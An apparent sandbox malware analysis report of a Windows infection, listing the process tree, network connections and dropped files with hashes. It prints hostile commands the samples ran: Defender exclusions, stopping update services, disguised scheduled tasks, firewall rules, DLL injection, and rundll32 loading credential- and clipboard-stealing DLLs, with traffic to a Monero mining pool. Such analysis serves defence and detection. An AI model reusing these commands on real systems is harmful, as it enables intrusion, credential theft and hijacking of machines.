"C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe"

C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe

"C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\is-CQ33T.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-CQ33T.tmp\8758677____.exe" /S /UID=lylal220

C:\Windows\system32\schtasks.exe

"schtasks" /Query /TN "DigitalPulseUpdateTask"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:N"

C:\Windows\system32\schtasks.exe

"schtasks" /Create /TN "DigitalPulseUpdateTask" /SC HOURLY /TR "C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseUpdate.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:R" /E

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

"C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe" 5333:::clickId=:::srcId=

C:\Users\Admin\AppData\Local\Temp\da-969f5-489-bcd95-8e61c4329d231\Dyfaebedady.exe

"C:\Users\Admin\AppData\Local\Temp\da-969f5-489-bcd95-8e61c4329d231\Dyfaebedady.exe"

C:\Program Files\Windows Defender Advanced Threat Protection\NPZREDLAVA\lightcleaner.exe

"C:\Program Files\Windows Defender Advanced Threat Protection\NPZREDLAVA\lightcleaner.exe" /VERYSILENT

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 724

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\is-LR89E.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-LR89E.tmp\lightcleaner.tmp" /SL5="$2025A,833775,56832,C:\Program Files\Windows Defender Advanced Threat Protection\NPZREDLAVA\lightcleaner.exe" /VERYSILENT

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:R" /E

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050448331\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050448331\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050448331\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050448331\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050448331\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050448331\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=100.0.4815.21 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x2be8a0,0x2be8b0,0x2be8bc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4112 -s 1740

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\4367208060.exe"

C:\Users\Admin\AppData\Local\Temp\4367208060.exe

"C:\Users\Admin\AppData\Local\Temp\4367208060.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "yIAAtiFZaBN5sQouZpblrsJG.exe" /f & erase "C:\Users\Admin\Pictures\yIAAtiFZaBN5sQouZpblrsJG.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "yIAAtiFZaBN5sQouZpblrsJG.exe" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\syswow64\rundll32.exe

"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\4367208060.exe

C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe

"C:\Users\Admin\Pictures\9pPO2OLtbGO5ERHr1s1bdqBv.exe"

C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe

"C:\Users\Admin\Pictures\BxbQhhKVCYpOFW52s6QijmeW.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
DE 148.251.234.93:443 yip.su tcp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 8.8.8.8:53 jetpackdelivery.net udp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 bolidare.beget.tech udp
US 85.217.144.143:80 85.217.144.143 tcp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 goboh2b.top udp
US 8.8.8.8:53 net.geo.opera.com udp
US 85.217.144.143:80 85.217.144.143 tcp
US 8.8.8.8:53 link.storjshare.io udp
US 104.21.93.225:443 flyawayaero.net tcp
US 188.114.96.0:443 jetpackdelivery.net tcp
NL 13.227.219.25:443 downloads.digitalpulsedata.com tcp
NL 185.26.182.111:80 net.geo.opera.com tcp
US 172.67.187.122:443 lycheepanel.info tcp
US 8.8.8.8:53 d062.userscloud.net udp
US 136.0.77.2:443 link.storjshare.io tcp
RU 91.106.207.50:80 bolidare.beget.tech tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
DE 168.119.140.62:443 d062.userscloud.net tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
US 8.8.8.8:53 potatogoose.com udp
US 8.8.8.8:53 justsafepay.com udp
RU 45.8.228.16:80 goboh2b.top tcp
US 172.67.180.173:443 potatogoose.com tcp
US 188.114.97.0:443 justsafepay.com tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 10.64.42.5.in-addr.arpa udp
US 8.8.8.8:53 143.144.217.85.in-addr.arpa udp
US 8.8.8.8:53 225.93.21.104.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 25.219.227.13.in-addr.arpa udp
US 8.8.8.8:53 111.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 122.187.67.172.in-addr.arpa udp
US 8.8.8.8:53 2.77.0.136.in-addr.arpa udp
US 8.8.8.8:53 50.207.106.91.in-addr.arpa udp
US 8.8.8.8:53 62.140.119.168.in-addr.arpa udp
US 8.8.8.8:53 16.228.8.45.in-addr.arpa udp
US 8.8.8.8:53 173.180.67.172.in-addr.arpa udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
US 136.0.77.2:80 link.storjshare.io tcp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 185.26.182.124:443 autoupdate.geo.opera.com tcp
NL 185.26.182.124:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 136.0.77.2:443 link.storjshare.io tcp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 8.8.8.8:53 124.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 1.202.248.87.in-addr.arpa udp
US 8.8.8.8:53 121.72.236.156.in-addr.arpa udp
US 8.8.8.8:53 features.opera-api2.com udp
US 8.8.8.8:53 download.opera.com udp
NL 82.145.216.16:443 features.opera-api2.com tcp
NL 185.26.182.117:443 download.opera.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 download3.operacdn.com udp
GB 95.101.143.176:443 download3.operacdn.com tcp
US 8.8.8.8:53 demo.seafile.com udp
DE 168.119.152.22:80 demo.seafile.com tcp
DE 168.119.152.22:443 demo.seafile.com tcp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 147.174.42.23.in-addr.arpa udp
US 8.8.8.8:53 16.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 117.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 9.175.53.84.in-addr.arpa udp
US 8.8.8.8:53 176.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 22.152.119.168.in-addr.arpa udp
BG 193.42.32.29:80 193.42.32.29 tcp
BG 193.42.32.29:80 193.42.32.29 tcp
US 8.8.8.8:53 29.32.42.193.in-addr.arpa udp
US 8.8.8.8:53 connectini.net udp
GB 91.109.116.11:443 connectini.net tcp
US 8.8.8.8:53 m7val1dat0r.info udp
US 8.8.8.8:53 11.116.109.91.in-addr.arpa udp
US 8.8.8.8:53 vibrator.s3.pl-waw.scw.cloud udp
US 8.8.8.8:53 link.storjshare.io udp
PL 151.115.10.1:443 vibrator.s3.pl-waw.scw.cloud tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 wewewe.s3.eu-central-1.amazonaws.com udp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
DE 52.219.171.134:443 wewewe.s3.eu-central-1.amazonaws.com tcp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 1.10.115.151.in-addr.arpa udp
US 8.8.8.8:53 134.171.219.52.in-addr.arpa udp
US 8.8.8.8:53 360devtracking.com udp
GB 91.109.116.11:80 360devtracking.com tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 bapp.digitalpulsedata.com udp
CA 3.98.219.138:443 bapp.digitalpulsedata.com tcp
US 8.8.8.8:53 138.219.98.3.in-addr.arpa udp
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 184.139.19.162.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
DE 5.75.216.44:27015 5.75.216.44 tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 24.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 44.216.75.5.in-addr.arpa udp
RU 5.42.64.10:80 5.42.64.10 tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 254.109.26.67.in-addr.arpa udp
DE 172.217.23.206:80 tcp
DE 172.217.23.206:443 script.google.com tcp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 script.googleusercontent.com udp
NL 142.251.36.1:443 script.googleusercontent.com tcp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 66.112.168.52.in-addr.arpa udp
US 173.214.169.17:443 tcp
US 8.8.8.8:53 17.169.214.173.in-addr.arpa udp
US 67.26.109.254:80 tcp
BG 193.42.32.29:80 193.42.32.29 tcp
US 8.8.8.8:53 38b4ffe9-5cda-4041-ba04-1a79858e720b.uuid.ramboclub.net udp
CA 159.203.48.195:7001 tcp
US 96.102.157.179:25 tcp
US 8.8.8.8:53 195.48.203.159.in-addr.arpa udp
US 8.8.8.8:53 stun.sipgate.net udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 server7.ramboclub.net udp
US 162.159.130.233:443 cdn.discordapp.com tcp
BG 185.82.216.48:443 server7.ramboclub.net tcp
US 15.197.250.192:3478 stun.sipgate.net udp
US 8.8.8.8:53 mastertryprice.com udp
US 172.67.212.103:443 mastertryprice.com tcp
US 8.8.8.8:53 192.250.197.15.in-addr.arpa udp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 8.8.8.8:53 48.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 103.212.67.172.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
CA 174.138.115.38:7001 tcp
US 8.8.8.8:53 nl.linkedin.com udp
US 13.107.246.67:443 nl.linkedin.com tcp

Files

memory/4988-0-0x00007FF7D92E0000-0x00007FF7D96BE000-memory.dmp

memory/4264-5-0x00007FFEA2F50000-0x00007FFEA393C000-memory.dmp

memory/4264-7-0x000001AE6C000000-0x000001AE6C010000-memory.dmp

memory/4264-8-0x000001AE6C000000-0x000001AE6C010000-memory.dmp

memory/4264-6-0x000001AE6C140000-0x000001AE6C162000-memory.dmp

memory/4264-11-0x000001AE6C2F0000-0x000001AE6C366000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2vvrhngs.e4o.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4264-24-0x000001AE6C000000-0x000001AE6C010000-memory.dmp

memory/4988-25-0x00007FF7D92E0000-0x00007FF7D96BE000-memory.dmp

memory/2208-36-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2208-38-0x0000000073860000-0x0000000073F4E000-memory.dmp

memory/2208-46-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/4264-51-0x000001AE6C000000-0x000001AE6C010000-memory.dmp

memory/4264-61-0x00007FFEA2F50000-0x00007FFEA393C000-memory.dmp

C:\Users\Admin\Pictures\WoBo3DgtXXw4byBqb0UuRUrJ.exe

MD5 24fe48030f7d3097d5882535b04c3fa8
SHA1 a689a999a5e62055bda8c21b1dbe92c119308def
SHA256 424a2551d356754c882d04ac16c63e6b50b80b159549d23231001f629455756e
SHA512 45a842447d5e9c10822f7d5db1192a0e8e7917e6546dab6aebe2542b5a82bedc26aa8d96e3e99de82e2d0b662fcac70d6914248371af034b763f5dd85dab0c51

C:\Users\Admin\Pictures\6APWgN0NMfODLylJR3lyh0jZ.exe

MD5 dde72ae232dc63298465861482d7bb93
SHA1 557c5dbebc35bc82280e2a744a03ce5e78b3e6fb
SHA256 0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091
SHA512 389eb8f7b18fcdd1a6f275ff8acad211a10445ff412221796cd645c9a6458719cced553561e2b4d438783459d02e494d5140c0d85f2b3df617b7b2e031d234b2

C:\Users\Admin\Pictures\ot6qO5lQLXmvkfSWcwZ48lXR.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\ot6qO5lQLXmvkfSWcwZ48lXR.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\yIAAtiFZaBN5sQouZpblrsJG.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

C:\Users\Admin\Pictures\yIAAtiFZaBN5sQouZpblrsJG.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\TUSMX21oo8cNdNBsovMfwZt9.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

C:\Users\Admin\Pictures\efNDwqgCtrrVs5VKrqH19cEQ.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\oYX2u8fIAxUTdPgJpvdjbe4R.exe

MD5 fe469d9ce18f3bd33de41b8fd8701c4d
SHA1 99411eab81e0d7e8607e8fe0f715f635e541e52a
SHA256 b253f2cc3cafc35941d978a4d14b65610e641cb461e862fb0c155f3c30ce127a
SHA512 5b40c5259d01944e718bb14b8e6b994f2ea5bd391058aa8d086033cd609cb54231c7e07b4ab307ecfd5be28936e1c5576d3448504b99d9ac05c5442e5e1e85d9

C:\Users\Admin\Pictures\efNDwqgCtrrVs5VKrqH19cEQ.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\TUSMX21oo8cNdNBsovMfwZt9.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050448271154428.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/2832-134-0x0000000000500000-0x000000000081C000-memory.dmp

C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe

MD5 3ffc35d50f1d2a6c8ce810b81c1dbd70
SHA1 854149667ededcf771c80781cc6cde39300f67eb
SHA256 305b89220a6934ec928a74a838d7d41b9f5d2f891a766dd5fdd50fc888dfccf2
SHA512 1ebfd10dc18848269b9d6ad9d410b039f0b6a3d3dd9a26dc8c0b4a67839a52d01cc99351772a59561a957efca23ba596cd5c44e13c46e9b63c627e6767249718

memory/2832-129-0x0000000073860000-0x0000000073F4E000-memory.dmp

C:\Users\Admin\Pictures\pimnFhRU6OPmPZcL39zf5wL2.exe

MD5 3ffc35d50f1d2a6c8ce810b81c1dbd70
SHA1 854149667ededcf771c80781cc6cde39300f67eb
SHA256 305b89220a6934ec928a74a838d7d41b9f5d2f891a766dd5fdd50fc888dfccf2
